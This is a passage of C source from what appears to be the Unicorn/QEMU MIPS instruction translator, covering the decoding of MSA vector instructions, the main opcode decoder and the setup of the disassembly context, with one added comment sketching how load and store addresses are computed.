tws); break; } tcg_temp_free_i32(tcg_ctx, twd); tcg_temp_free_i32(tcg_ctx, tws); tcg_temp_free_i32(tcg_ctx, twt); tcg_temp_free_i32(tcg_ctx, tdf); } static void gen_msa_vec_v(CPUMIPSState *env, DisasContext *ctx) { #define MASK_MSA_VEC(op) (MASK_MSA_MINOR(op) | (op & (0x1f << 21))) TCGContext *tcg_ctx = ctx->uc->tcg_ctx; uint8_t wt = (ctx->opcode >> 16) & 0x1f; uint8_t ws = (ctx->opcode >> 11) & 0x1f; uint8_t wd = (ctx->opcode >> 6) & 0x1f; TCGv_i32 twd = tcg_const_i32(tcg_ctx, wd); TCGv_i32 tws = tcg_const_i32(tcg_ctx, ws); TCGv_i32 twt = tcg_const_i32(tcg_ctx, wt); switch (MASK_MSA_VEC(ctx->opcode)) { case OPC_AND_V: gen_helper_msa_and_v(tcg_ctx, tcg_ctx->cpu_env, twd, tws, twt); break; case OPC_OR_V: gen_helper_msa_or_v(tcg_ctx, tcg_ctx->cpu_env, twd, tws, twt); break; case OPC_NOR_V: gen_helper_msa_nor_v(tcg_ctx, tcg_ctx->cpu_env, twd, tws, twt); break; case OPC_XOR_V: gen_helper_msa_xor_v(tcg_ctx, tcg_ctx->cpu_env, twd, tws, twt); break; case OPC_BMNZ_V: gen_helper_msa_bmnz_v(tcg_ctx, tcg_ctx->cpu_env, twd, tws, twt); break; case OPC_BMZ_V: gen_helper_msa_bmz_v(tcg_ctx, tcg_ctx->cpu_env, twd, tws, twt); break; case OPC_BSEL_V: gen_helper_msa_bsel_v(tcg_ctx, tcg_ctx->cpu_env, twd, tws, twt); break; default: MIPS_INVAL("MSA instruction"); generate_exception_end(ctx, EXCP_RI); break; } tcg_temp_free_i32(tcg_ctx, twd); tcg_temp_free_i32(tcg_ctx, tws); tcg_temp_free_i32(tcg_ctx, twt); } static void gen_msa_vec(CPUMIPSState *env, DisasContext *ctx) { switch (MASK_MSA_VEC(ctx->opcode)) { case OPC_AND_V: case OPC_OR_V: case OPC_NOR_V: case OPC_XOR_V: case OPC_BMNZ_V: case OPC_BMZ_V: case OPC_BSEL_V: gen_msa_vec_v(env, ctx); break; case OPC_MSA_2R: gen_msa_2r(env, ctx); break; case OPC_MSA_2RF: gen_msa_2rf(env, ctx); break; default: MIPS_INVAL("MSA instruction"); generate_exception_end(ctx, EXCP_RI); break; } } 
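/*
 * Editorial sketch (not part of the original source): in gen_msa() below,
 * the LD.df/ST.df cases scale the signed 10-bit offset by the element size
 * ("s10 << df"), so LD.B reaches +/-512 bytes around the base register
 * while LD.D reaches +/-4096.  A minimal standalone model of that
 * effective-address computation, assuming only the DF_* numbering used in
 * this file (0 = byte ... 3 = doubleword):
 */
#if 0 /* illustrative only, not compiled */
static target_ulong msa_ldst_effective_addr(target_ulong base, uint32_t insn)
{
    int32_t s10 = sextract32(insn, 16, 10); /* signed 10-bit offset field */
    uint32_t df = insn & 0x3;               /* element size is 1 << df bytes */

    return base + (s10 << df);              /* offset scaled by element size */
}
#endif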
static void gen_msa(CPUMIPSState *env, DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; uint32_t opcode = ctx->opcode; check_insn(ctx, ASE_MSA); check_msa_access(ctx); switch (MASK_MSA_MINOR(opcode)) { case OPC_MSA_I8_00: case OPC_MSA_I8_01: case OPC_MSA_I8_02: gen_msa_i8(env, ctx); break; case OPC_MSA_I5_06: case OPC_MSA_I5_07: gen_msa_i5(env, ctx); break; case OPC_MSA_BIT_09: case OPC_MSA_BIT_0A: gen_msa_bit(env, ctx); break; case OPC_MSA_3R_0D: case OPC_MSA_3R_0E: case OPC_MSA_3R_0F: case OPC_MSA_3R_10: case OPC_MSA_3R_11: case OPC_MSA_3R_12: case OPC_MSA_3R_13: case OPC_MSA_3R_14: case OPC_MSA_3R_15: gen_msa_3r(env, ctx); break; case OPC_MSA_ELM: gen_msa_elm(env, ctx); break; case OPC_MSA_3RF_1A: case OPC_MSA_3RF_1B: case OPC_MSA_3RF_1C: gen_msa_3rf(env, ctx); break; case OPC_MSA_VEC: gen_msa_vec(env, ctx); break; case OPC_LD_B: case OPC_LD_H: case OPC_LD_W: case OPC_LD_D: case OPC_ST_B: case OPC_ST_H: case OPC_ST_W: case OPC_ST_D: { int32_t s10 = sextract32(ctx->opcode, 16, 10); uint8_t rs = (ctx->opcode >> 11) & 0x1f; uint8_t wd = (ctx->opcode >> 6) & 0x1f; uint8_t df = (ctx->opcode >> 0) & 0x3; TCGv_i32 twd = tcg_const_i32(tcg_ctx, wd); TCGv taddr = tcg_temp_new(tcg_ctx); gen_base_offset_addr(ctx, taddr, rs, s10 << df); switch (MASK_MSA_MINOR(opcode)) { case OPC_LD_B: gen_helper_msa_ld_b(tcg_ctx, tcg_ctx->cpu_env, twd, taddr); break; case OPC_LD_H: gen_helper_msa_ld_h(tcg_ctx, tcg_ctx->cpu_env, twd, taddr); break; case OPC_LD_W: gen_helper_msa_ld_w(tcg_ctx, tcg_ctx->cpu_env, twd, taddr); break; case OPC_LD_D: gen_helper_msa_ld_d(tcg_ctx, tcg_ctx->cpu_env, twd, taddr); break; case OPC_ST_B: gen_helper_msa_st_b(tcg_ctx, tcg_ctx->cpu_env, twd, taddr); break; case OPC_ST_H: gen_helper_msa_st_h(tcg_ctx, tcg_ctx->cpu_env, twd, taddr); break; case OPC_ST_W: gen_helper_msa_st_w(tcg_ctx, tcg_ctx->cpu_env, twd, taddr); break; case OPC_ST_D: gen_helper_msa_st_d(tcg_ctx, tcg_ctx->cpu_env, twd, taddr); break; } tcg_temp_free_i32(tcg_ctx, twd); tcg_temp_free(tcg_ctx, taddr); } break; default: MIPS_INVAL("MSA instruction"); generate_exception_end(ctx, EXCP_RI); break; } } static void decode_opc(CPUMIPSState *env, DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; int32_t offset; int rs, rt, rd, sa; uint32_t op, op1; int16_t imm; /* make sure instructions are on a word boundary */ if (ctx->base.pc_next & 0x3) { env->CP0_BadVAddr = ctx->base.pc_next; generate_exception_err(ctx, EXCP_AdEL, EXCP_INST_NOTAVAIL); return; } /* Handle blikely not taken case */ if ((ctx->hflags & MIPS_HFLAG_BMASK_BASE) == MIPS_HFLAG_BL) { TCGLabel *l1 = gen_new_label(tcg_ctx); tcg_gen_brcondi_tl(tcg_ctx, TCG_COND_NE, tcg_ctx->bcond, 0, l1); tcg_gen_movi_i32(tcg_ctx, tcg_ctx->hflags, ctx->hflags & ~MIPS_HFLAG_BMASK); gen_goto_tb(ctx, 1, ctx->base.pc_next + 4); gen_set_label(tcg_ctx, l1); } op = MASK_OP_MAJOR(ctx->opcode); rs = (ctx->opcode >> 21) & 0x1f; rt = (ctx->opcode >> 16) & 0x1f; rd = (ctx->opcode >> 11) & 0x1f; sa = (ctx->opcode >> 6) & 0x1f; imm = (int16_t)ctx->opcode; switch (op) { case OPC_SPECIAL: decode_opc_special(env, ctx); break; case OPC_SPECIAL2: #if defined(TARGET_MIPS64) if ((ctx->insn_flags & INSN_R5900) && (ctx->insn_flags & ASE_MMI)) { decode_mmi(env, ctx); #else if (ctx->insn_flags & ASE_MXU) { decode_opc_mxu(env, ctx); #endif } else { decode_opc_special2_legacy(env, ctx); } break; case OPC_SPECIAL3: #if defined(TARGET_MIPS64) if (ctx->insn_flags & INSN_R5900) { decode_mmi_sq(env, ctx); /* MMI_OPC_SQ */ } else { decode_opc_special3(env, ctx); } #else decode_opc_special3(env, 
ctx); #endif break; case OPC_REGIMM: op1 = MASK_REGIMM(ctx->opcode); switch (op1) { case OPC_BLTZL: /* REGIMM branches */ case OPC_BGEZL: case OPC_BLTZALL: case OPC_BGEZALL: check_insn(ctx, ISA_MIPS2); check_insn_opc_removed(ctx, ISA_MIPS32R6); /* Fallthrough */ case OPC_BLTZ: case OPC_BGEZ: gen_compute_branch(ctx, op1, 4, rs, -1, imm << 2, 4); break; case OPC_BLTZAL: case OPC_BGEZAL: if (ctx->insn_flags & ISA_MIPS32R6) { if (rs == 0) { /* OPC_NAL, OPC_BAL */ gen_compute_branch(ctx, op1, 4, 0, -1, imm << 2, 4); } else { generate_exception_end(ctx, EXCP_RI); } } else { gen_compute_branch(ctx, op1, 4, rs, -1, imm << 2, 4); } break; case OPC_TGEI: /* REGIMM traps */ case OPC_TGEIU: case OPC_TLTI: case OPC_TLTIU: case OPC_TEQI: case OPC_TNEI: check_insn(ctx, ISA_MIPS2); check_insn_opc_removed(ctx, ISA_MIPS32R6); gen_trap(ctx, op1, rs, -1, imm); break; case OPC_SIGRIE: check_insn(ctx, ISA_MIPS32R6); generate_exception_end(ctx, EXCP_RI); break; case OPC_SYNCI: check_insn(ctx, ISA_MIPS32R2); /* * Break the TB to be able to sync copied instructions * immediately. */ ctx->base.is_jmp = DISAS_STOP; break; case OPC_BPOSGE32: /* MIPS DSP branch */ #if defined(TARGET_MIPS64) case OPC_BPOSGE64: #endif check_dsp(ctx); gen_compute_branch(ctx, op1, 4, -1, -2, (int32_t)imm << 2, 4); break; #if defined(TARGET_MIPS64) case OPC_DAHI: check_insn(ctx, ISA_MIPS32R6); check_mips_64(ctx); if (rs != 0) { tcg_gen_addi_tl(tcg_ctx, tcg_ctx->cpu_gpr[rs], tcg_ctx->cpu_gpr[rs], (int64_t)imm << 32); } break; case OPC_DATI: check_insn(ctx, ISA_MIPS32R6); check_mips_64(ctx); if (rs != 0) { tcg_gen_addi_tl(tcg_ctx, tcg_ctx->cpu_gpr[rs], tcg_ctx->cpu_gpr[rs], (int64_t)imm << 48); } break; #endif default: /* Invalid */ MIPS_INVAL("regimm"); generate_exception_end(ctx, EXCP_RI); break; } break; case OPC_CP0: check_cp0_enabled(ctx); op1 = MASK_CP0(ctx->opcode); switch (op1) { case OPC_MFC0: case OPC_MTC0: case OPC_MFTR: case OPC_MTTR: case OPC_MFHC0: case OPC_MTHC0: #if defined(TARGET_MIPS64) case OPC_DMFC0: case OPC_DMTC0: #endif gen_cp0(env, ctx, op1, rt, rd); break; case OPC_C0: case OPC_C0_1: case OPC_C0_2: case OPC_C0_3: case OPC_C0_4: case OPC_C0_5: case OPC_C0_6: case OPC_C0_7: case OPC_C0_8: case OPC_C0_9: case OPC_C0_A: case OPC_C0_B: case OPC_C0_C: case OPC_C0_D: case OPC_C0_E: case OPC_C0_F: gen_cp0(env, ctx, MASK_C0(ctx->opcode), rt, rd); break; case OPC_MFMC0: { uint32_t op2; TCGv t0 = tcg_temp_new(tcg_ctx); op2 = MASK_MFMC0(ctx->opcode); switch (op2) { case OPC_DMT: check_cp0_mt(ctx); gen_helper_dmt(tcg_ctx, t0); gen_store_gpr(tcg_ctx, t0, rt); break; case OPC_EMT: check_cp0_mt(ctx); gen_helper_emt(tcg_ctx, t0); gen_store_gpr(tcg_ctx, t0, rt); break; case OPC_DVPE: check_cp0_mt(ctx); gen_helper_dvpe(tcg_ctx, t0, tcg_ctx->cpu_env); gen_store_gpr(tcg_ctx, t0, rt); break; case OPC_EVPE: check_cp0_mt(ctx); gen_helper_evpe(tcg_ctx, t0, tcg_ctx->cpu_env); gen_store_gpr(tcg_ctx, t0, rt); break; case OPC_DVP: check_insn(ctx, ISA_MIPS32R6); if (ctx->vp) { gen_helper_dvp(tcg_ctx, t0, tcg_ctx->cpu_env); gen_store_gpr(tcg_ctx, t0, rt); } break; case OPC_EVP: check_insn(ctx, ISA_MIPS32R6); if (ctx->vp) { gen_helper_evp(tcg_ctx, t0, tcg_ctx->cpu_env); gen_store_gpr(tcg_ctx, t0, rt); } break; case OPC_DI: check_insn(ctx, ISA_MIPS32R2); save_cpu_state(ctx, 1); gen_helper_di(tcg_ctx, t0, tcg_ctx->cpu_env); gen_store_gpr(tcg_ctx, t0, rt); /* * Stop translation as we may have switched * the execution mode. 
*/ ctx->base.is_jmp = DISAS_STOP; break; case OPC_EI: check_insn(ctx, ISA_MIPS32R2); save_cpu_state(ctx, 1); gen_helper_ei(tcg_ctx, t0, tcg_ctx->cpu_env); gen_store_gpr(tcg_ctx, t0, rt); /* * DISAS_STOP isn't sufficient, we need to ensure we break * out of translated code to check for pending interrupts. */ gen_save_pc(tcg_ctx, ctx->base.pc_next + 4); ctx->base.is_jmp = DISAS_EXIT; break; default: /* Invalid */ MIPS_INVAL("mfmc0"); generate_exception_end(ctx, EXCP_RI); break; } tcg_temp_free(tcg_ctx, t0); } break; case OPC_RDPGPR: check_insn(ctx, ISA_MIPS32R2); gen_load_srsgpr(tcg_ctx, rt, rd); break; case OPC_WRPGPR: check_insn(ctx, ISA_MIPS32R2); gen_store_srsgpr(tcg_ctx, rt, rd); break; default: MIPS_INVAL("cp0"); generate_exception_end(ctx, EXCP_RI); break; } break; case OPC_BOVC: /* OPC_BEQZALC, OPC_BEQC, OPC_ADDI */ if (ctx->insn_flags & ISA_MIPS32R6) { /* OPC_BOVC, OPC_BEQZALC, OPC_BEQC */ gen_compute_compact_branch(ctx, op, rs, rt, imm << 2); } else { /* OPC_ADDI */ /* Arithmetic with immediate opcode */ gen_arith_imm(ctx, op, rt, rs, imm); } break; case OPC_ADDIU: gen_arith_imm(ctx, op, rt, rs, imm); break; case OPC_SLTI: /* Set on less than with immediate opcode */ case OPC_SLTIU: gen_slt_imm(ctx, op, rt, rs, imm); break; case OPC_ANDI: /* Arithmetic with immediate opcode */ case OPC_LUI: /* OPC_AUI */ case OPC_ORI: case OPC_XORI: gen_logic_imm(ctx, op, rt, rs, imm); break; case OPC_J: /* Jump */ case OPC_JAL: offset = (int32_t)(ctx->opcode & 0x3FFFFFF) << 2; gen_compute_branch(ctx, op, 4, rs, rt, offset, 4); break; /* Branch */ case OPC_BLEZC: /* OPC_BGEZC, OPC_BGEC, OPC_BLEZL */ if (ctx->insn_flags & ISA_MIPS32R6) { if (rt == 0) { generate_exception_end(ctx, EXCP_RI); break; } /* OPC_BLEZC, OPC_BGEZC, OPC_BGEC */ gen_compute_compact_branch(ctx, op, rs, rt, imm << 2); } else { /* OPC_BLEZL */ gen_compute_branch(ctx, op, 4, rs, rt, imm << 2, 4); } break; case OPC_BGTZC: /* OPC_BLTZC, OPC_BLTC, OPC_BGTZL */ if (ctx->insn_flags & ISA_MIPS32R6) { if (rt == 0) { generate_exception_end(ctx, EXCP_RI); break; } /* OPC_BGTZC, OPC_BLTZC, OPC_BLTC */ gen_compute_compact_branch(ctx, op, rs, rt, imm << 2); } else { /* OPC_BGTZL */ gen_compute_branch(ctx, op, 4, rs, rt, imm << 2, 4); } break; case OPC_BLEZALC: /* OPC_BGEZALC, OPC_BGEUC, OPC_BLEZ */ if (rt == 0) { /* OPC_BLEZ */ gen_compute_branch(ctx, op, 4, rs, rt, imm << 2, 4); } else { check_insn(ctx, ISA_MIPS32R6); /* OPC_BLEZALC, OPC_BGEZALC, OPC_BGEUC */ gen_compute_compact_branch(ctx, op, rs, rt, imm << 2); } break; case OPC_BGTZALC: /* OPC_BLTZALC, OPC_BLTUC, OPC_BGTZ */ if (rt == 0) { /* OPC_BGTZ */ gen_compute_branch(ctx, op, 4, rs, rt, imm << 2, 4); } else { check_insn(ctx, ISA_MIPS32R6); /* OPC_BGTZALC, OPC_BLTZALC, OPC_BLTUC */ gen_compute_compact_branch(ctx, op, rs, rt, imm << 2); } break; case OPC_BEQL: case OPC_BNEL: check_insn(ctx, ISA_MIPS2); check_insn_opc_removed(ctx, ISA_MIPS32R6); /* Fallthrough */ case OPC_BEQ: case OPC_BNE: gen_compute_branch(ctx, op, 4, rs, rt, imm << 2, 4); break; case OPC_LL: /* Load and stores */ check_insn(ctx, ISA_MIPS2); if (ctx->insn_flags & INSN_R5900) { check_insn_opc_user_only(ctx, INSN_R5900); } /* Fallthrough */ case OPC_LWL: case OPC_LWR: check_insn_opc_removed(ctx, ISA_MIPS32R6); /* Fallthrough */ case OPC_LB: case OPC_LH: case OPC_LW: case OPC_LWPC: case OPC_LBU: case OPC_LHU: gen_ld(ctx, op, rt, rs, imm); break; case OPC_SWL: case OPC_SWR: check_insn_opc_removed(ctx, ISA_MIPS32R6); /* fall through */ case OPC_SB: case OPC_SH: case OPC_SW: gen_st(ctx, op, rt, rs, imm); break; case 
OPC_SC: check_insn(ctx, ISA_MIPS2); check_insn_opc_removed(ctx, ISA_MIPS32R6); if (ctx->insn_flags & INSN_R5900) { check_insn_opc_user_only(ctx, INSN_R5900); } gen_st_cond(ctx, rt, rs, imm, MO_TESL, false); break; case OPC_CACHE: check_insn_opc_removed(ctx, ISA_MIPS32R6); check_cp0_enabled(ctx); check_insn(ctx, ISA_MIPS3 | ISA_MIPS32); if (ctx->hflags & MIPS_HFLAG_ITC_CACHE) { gen_cache_operation(ctx, rt, rs, imm); } /* Treat as NOP. */ break; case OPC_PREF: check_insn_opc_removed(ctx, ISA_MIPS32R6); if (ctx->insn_flags & INSN_R5900) { /* Treat as NOP. */ } else { check_insn(ctx, ISA_MIPS4 | ISA_MIPS32); /* Treat as NOP. */ } break; /* Floating point (COP1). */ case OPC_LWC1: case OPC_LDC1: case OPC_SWC1: case OPC_SDC1: gen_cop1_ldst(ctx, op, rt, rs, imm); break; case OPC_CP1: op1 = MASK_CP1(ctx->opcode); switch (op1) { case OPC_MFHC1: case OPC_MTHC1: check_cp1_enabled(ctx); check_insn(ctx, ISA_MIPS32R2); /* fall through */ case OPC_MFC1: case OPC_CFC1: case OPC_MTC1: case OPC_CTC1: check_cp1_enabled(ctx); gen_cp1(ctx, op1, rt, rd); break; #if defined(TARGET_MIPS64) case OPC_DMFC1: case OPC_DMTC1: check_cp1_enabled(ctx); check_insn(ctx, ISA_MIPS3); check_mips_64(ctx); gen_cp1(ctx, op1, rt, rd); break; #endif case OPC_BC1EQZ: /* OPC_BC1ANY2 */ check_cp1_enabled(ctx); if (ctx->insn_flags & ISA_MIPS32R6) { /* OPC_BC1EQZ */ gen_compute_branch1_r6(ctx, MASK_CP1(ctx->opcode), rt, imm << 2, 4); } else { /* OPC_BC1ANY2 */ check_cop1x(ctx); check_insn(ctx, ASE_MIPS3D); gen_compute_branch1(ctx, MASK_BC1(ctx->opcode), (rt >> 2) & 0x7, imm << 2); } break; case OPC_BC1NEZ: check_cp1_enabled(ctx); check_insn(ctx, ISA_MIPS32R6); gen_compute_branch1_r6(ctx, MASK_CP1(ctx->opcode), rt, imm << 2, 4); break; case OPC_BC1ANY4: check_cp1_enabled(ctx); check_insn_opc_removed(ctx, ISA_MIPS32R6); check_cop1x(ctx); check_insn(ctx, ASE_MIPS3D); /* fall through */ case OPC_BC1: check_cp1_enabled(ctx); check_insn_opc_removed(ctx, ISA_MIPS32R6); gen_compute_branch1(ctx, MASK_BC1(ctx->opcode), (rt >> 2) & 0x7, imm << 2); break; case OPC_PS_FMT: check_ps(ctx); /* fall through */ case OPC_S_FMT: case OPC_D_FMT: check_cp1_enabled(ctx); gen_farith(ctx, ctx->opcode & FOP(0x3f, 0x1f), rt, rd, sa, (imm >> 8) & 0x7); break; case OPC_W_FMT: case OPC_L_FMT: { int r6_op = ctx->opcode & FOP(0x3f, 0x1f); check_cp1_enabled(ctx); if (ctx->insn_flags & ISA_MIPS32R6) { switch (r6_op) { case R6_OPC_CMP_AF_S: case R6_OPC_CMP_UN_S: case R6_OPC_CMP_EQ_S: case R6_OPC_CMP_UEQ_S: case R6_OPC_CMP_LT_S: case R6_OPC_CMP_ULT_S: case R6_OPC_CMP_LE_S: case R6_OPC_CMP_ULE_S: case R6_OPC_CMP_SAF_S: case R6_OPC_CMP_SUN_S: case R6_OPC_CMP_SEQ_S: case R6_OPC_CMP_SEUQ_S: case R6_OPC_CMP_SLT_S: case R6_OPC_CMP_SULT_S: case R6_OPC_CMP_SLE_S: case R6_OPC_CMP_SULE_S: case R6_OPC_CMP_OR_S: case R6_OPC_CMP_UNE_S: case R6_OPC_CMP_NE_S: case R6_OPC_CMP_SOR_S: case R6_OPC_CMP_SUNE_S: case R6_OPC_CMP_SNE_S: gen_r6_cmp_s(ctx, ctx->opcode & 0x1f, rt, rd, sa); break; case R6_OPC_CMP_AF_D: case R6_OPC_CMP_UN_D: case R6_OPC_CMP_EQ_D: case R6_OPC_CMP_UEQ_D: case R6_OPC_CMP_LT_D: case R6_OPC_CMP_ULT_D: case R6_OPC_CMP_LE_D: case R6_OPC_CMP_ULE_D: case R6_OPC_CMP_SAF_D: case R6_OPC_CMP_SUN_D: case R6_OPC_CMP_SEQ_D: case R6_OPC_CMP_SEUQ_D: case R6_OPC_CMP_SLT_D: case R6_OPC_CMP_SULT_D: case R6_OPC_CMP_SLE_D: case R6_OPC_CMP_SULE_D: case R6_OPC_CMP_OR_D: case R6_OPC_CMP_UNE_D: case R6_OPC_CMP_NE_D: case R6_OPC_CMP_SOR_D: case R6_OPC_CMP_SUNE_D: case R6_OPC_CMP_SNE_D: gen_r6_cmp_d(ctx, ctx->opcode & 0x1f, rt, rd, sa); break; default: gen_farith(ctx, ctx->opcode & FOP(0x3f, 
0x1f), rt, rd, sa, (imm >> 8) & 0x7); break; } } else { gen_farith(ctx, ctx->opcode & FOP(0x3f, 0x1f), rt, rd, sa, (imm >> 8) & 0x7); } break; } case OPC_BZ_V: case OPC_BNZ_V: case OPC_BZ_B: case OPC_BZ_H: case OPC_BZ_W: case OPC_BZ_D: case OPC_BNZ_B: case OPC_BNZ_H: case OPC_BNZ_W: case OPC_BNZ_D: check_insn(ctx, ASE_MSA); gen_msa_branch(env, ctx, op1); break; default: MIPS_INVAL("cp1"); generate_exception_end(ctx, EXCP_RI); break; } break; /* Compact branches [R6] and COP2 [non-R6] */ case OPC_BC: /* OPC_LWC2 */ case OPC_BALC: /* OPC_SWC2 */ if (ctx->insn_flags & ISA_MIPS32R6) { /* OPC_BC, OPC_BALC */ gen_compute_compact_branch(ctx, op, 0, 0, sextract32(ctx->opcode << 2, 0, 28)); } else { /* OPC_LWC2, OPC_SWC2 */ /* COP2: Not implemented. */ generate_exception_err(ctx, EXCP_CpU, 2); } break; case OPC_BEQZC: /* OPC_JIC, OPC_LDC2 */ case OPC_BNEZC: /* OPC_JIALC, OPC_SDC2 */ if (ctx->insn_flags & ISA_MIPS32R6) { if (rs != 0) { /* OPC_BEQZC, OPC_BNEZC */ gen_compute_compact_branch(ctx, op, rs, 0, sextract32(ctx->opcode << 2, 0, 23)); } else { /* OPC_JIC, OPC_JIALC */ gen_compute_compact_branch(ctx, op, 0, rt, imm); } } else { /* OPC_LWC2, OPC_SWC2 */ /* COP2: Not implemented. */ generate_exception_err(ctx, EXCP_CpU, 2); } break; case OPC_CP2: check_insn(ctx, INSN_LOONGSON2F); /* Note that these instructions use different fields. */ gen_loongson_multimedia(ctx, sa, rd, rt); break; case OPC_CP3: check_insn_opc_removed(ctx, ISA_MIPS32R6); if (ctx->CP0_Config1 & (1 << CP0C1_FP)) { check_cp1_enabled(ctx); op1 = MASK_CP3(ctx->opcode); switch (op1) { case OPC_LUXC1: case OPC_SUXC1: check_insn(ctx, ISA_MIPS5 | ISA_MIPS32R2); /* Fallthrough */ case OPC_LWXC1: case OPC_LDXC1: case OPC_SWXC1: case OPC_SDXC1: check_insn(ctx, ISA_MIPS4 | ISA_MIPS32R2); gen_flt3_ldst(ctx, op1, sa, rd, rs, rt); break; case OPC_PREFX: check_insn(ctx, ISA_MIPS4 | ISA_MIPS32R2); /* Treat as NOP. 
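PREFX is only a prefetch hint, so discarding it cannot change architectural state.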
*/ break; case OPC_ALNV_PS: check_insn(ctx, ISA_MIPS5 | ISA_MIPS32R2); /* Fallthrough */ case OPC_MADD_S: case OPC_MADD_D: case OPC_MADD_PS: case OPC_MSUB_S: case OPC_MSUB_D: case OPC_MSUB_PS: case OPC_NMADD_S: case OPC_NMADD_D: case OPC_NMADD_PS: case OPC_NMSUB_S: case OPC_NMSUB_D: case OPC_NMSUB_PS: check_insn(ctx, ISA_MIPS4 | ISA_MIPS32R2); gen_flt3_arith(ctx, op1, sa, rs, rd, rt); break; default: MIPS_INVAL("cp3"); generate_exception_end(ctx, EXCP_RI); break; } } else { generate_exception_err(ctx, EXCP_CpU, 1); } break; #if defined(TARGET_MIPS64) /* MIPS64 opcodes */ case OPC_LLD: if (ctx->insn_flags & INSN_R5900) { check_insn_opc_user_only(ctx, INSN_R5900); } /* fall through */ case OPC_LDL: case OPC_LDR: check_insn_opc_removed(ctx, ISA_MIPS32R6); /* fall through */ case OPC_LWU: case OPC_LD: check_insn(ctx, ISA_MIPS3); check_mips_64(ctx); gen_ld(ctx, op, rt, rs, imm); break; case OPC_SDL: case OPC_SDR: check_insn_opc_removed(ctx, ISA_MIPS32R6); /* fall through */ case OPC_SD: check_insn(ctx, ISA_MIPS3); check_mips_64(ctx); gen_st(ctx, op, rt, rs, imm); break; case OPC_SCD: check_insn_opc_removed(ctx, ISA_MIPS32R6); check_insn(ctx, ISA_MIPS3); if (ctx->insn_flags & INSN_R5900) { check_insn_opc_user_only(ctx, INSN_R5900); } check_mips_64(ctx); gen_st_cond(ctx, rt, rs, imm, MO_TEQ, false); break; case OPC_BNVC: /* OPC_BNEZALC, OPC_BNEC, OPC_DADDI */ if (ctx->insn_flags & ISA_MIPS32R6) { /* OPC_BNVC, OPC_BNEZALC, OPC_BNEC */ gen_compute_compact_branch(ctx, op, rs, rt, imm << 2); } else { /* OPC_DADDI */ check_insn(ctx, ISA_MIPS3); check_mips_64(ctx); gen_arith_imm(ctx, op, rt, rs, imm); } break; case OPC_DADDIU: check_insn(ctx, ISA_MIPS3); check_mips_64(ctx); gen_arith_imm(ctx, op, rt, rs, imm); break; #else case OPC_BNVC: /* OPC_BNEZALC, OPC_BNEC */ if (ctx->insn_flags & ISA_MIPS32R6) { gen_compute_compact_branch(ctx, op, rs, rt, imm << 2); } else { MIPS_INVAL("major opcode"); generate_exception_end(ctx, EXCP_RI); } break; #endif case OPC_DAUI: /* OPC_JALX */ if (ctx->insn_flags & ISA_MIPS32R6) { #if defined(TARGET_MIPS64) /* OPC_DAUI */ check_mips_64(ctx); if (rs == 0) { generate_exception(ctx, EXCP_RI); } else if (rt != 0) { TCGv t0 = tcg_temp_new(tcg_ctx); gen_load_gpr(tcg_ctx, t0, rs); tcg_gen_addi_tl(tcg_ctx, tcg_ctx->cpu_gpr[rt], t0, imm << 16); tcg_temp_free(tcg_ctx, t0); } #else generate_exception_end(ctx, EXCP_RI); MIPS_INVAL("major opcode"); #endif } else { /* OPC_JALX */ check_insn(ctx, ASE_MIPS16 | ASE_MICROMIPS); offset = (int32_t)(ctx->opcode & 0x3FFFFFF) << 2; gen_compute_branch(ctx, op, 4, rs, rt, offset, 4); } break; case OPC_MSA: /* OPC_MDMX */ if (ctx->insn_flags & INSN_R5900) { #if defined(TARGET_MIPS64) gen_mmi_lq(env, ctx); /* MMI_OPC_LQ */ #endif } else { /* MDMX: Not implemented. 
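MDMX shares this major opcode with MSA; MDMX itself is not supported, so the encoding is handed to the MSA decoder, which raises a Reserved Instruction exception for anything it does not recognize.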
*/
            gen_msa(env, ctx);
        }
        break;
    case OPC_PCREL:
        check_insn(ctx, ISA_MIPS32R6);
        gen_pcrel(ctx, ctx->opcode, ctx->base.pc_next, rs);
        break;
    default: /* Invalid */
        MIPS_INVAL("major opcode");
        generate_exception_end(ctx, EXCP_RI);
        break;
    }
}

static void mips_tr_init_disas_context(DisasContextBase *dcbase, CPUState *cs)
{
    DisasContext *ctx = container_of(dcbase, DisasContext, base);
    CPUMIPSState *env = cs->env_ptr;

    // unicorn setup
    ctx->uc = cs->uc;

    ctx->page_start = ctx->base.pc_first & TARGET_PAGE_MASK;
    ctx->saved_pc = -1;
    ctx->insn_flags = env->insn_flags;
    ctx->CP0_Config1 = env->CP0_Config1;
    ctx->CP0_Config2 = env->CP0_Config2;
    ctx->CP0_Config3 = env->CP0_Config3;
    ctx->CP0_Config5 = env->CP0_Config5;
    ctx->btarget = 0;
    ctx->kscrexist = (env->CP0_Config4 >> CP0C4_KScrExist) & 0xff;
    ctx->rxi = (env->CP0_Config3 >> CP0C3_RXI) & 1;
    ctx->ie = (env->CP0_Config4 >> CP0C4_IE) & 3;
    ctx->bi = (env->CP0_Config3 >> CP0C3_BI) & 1;
    ctx->bp = (env->CP0_Config3 >> CP0C3_BP) & 1;
    ctx->PAMask = env->PAMask;
    ctx->mvh = (env->CP0_Config5 >> CP0C5_MVH) & 1;
    ctx->eva = (env->CP0_Config5 >> CP0C5_EVA) & 1;
    ctx->sc = (env->CP0_Config3 >> CP0C3_SC) & 1;
    ctx->CP0_LLAddr_shift = env->CP0_LLAddr_shift;
    ctx->cmgcr = (env->CP0_Config3 >> CP0C3_CMGCR) & 1;
    /* Restore delay slot state from the tb context. */
    ctx->hflags = (uint32_t)ctx->base.tb->flags; /* FIXME: maybe use 64 bits? */
    ctx->ulri = (env->CP0_Config3 >> CP0C3_ULRI) & 1;
    ctx->ps = ((env->active_fpu.fcr0 >> FCR0_PS) & 1) ||
              (env->insn_flags & (INSN_LOONGSON2E | INSN_LOONGSON2F));
    ctx->vp = (env->CP0_Config5 >> CP0C5_VP) & 1;
    ctx->mrp = (env->CP0_Config5 >> CP0C5_MRP) & 1;
    ctx->nan2008 = (env->active_fpu.fcr31 >> FCR31_NAN2008) & 1;
    ctx->abs2008 = (env->active_fpu.fcr31 >> FCR31_ABS2008) & 1;
    ctx->mi = (env->CP0_Config5 >> CP0C5_MI) & 1;
    ctx->gi = (env->CP0_Config5 >> CP0C5_GI) & 3;
    restore_cpu_state(env, ctx);
    ctx->mem_idx = hflags_mmu_index(ctx->hflags);
    ctx->default_tcg_memop_mask = (ctx->insn_flags & ISA_MIPS32R6) ?
                                  MO_UNALN : MO_ALIGN;
    LOG_DISAS("\ntb %p idx %d hflags %04x\n", ctx->base.tb, ctx->mem_idx,
              ctx->hflags);
}

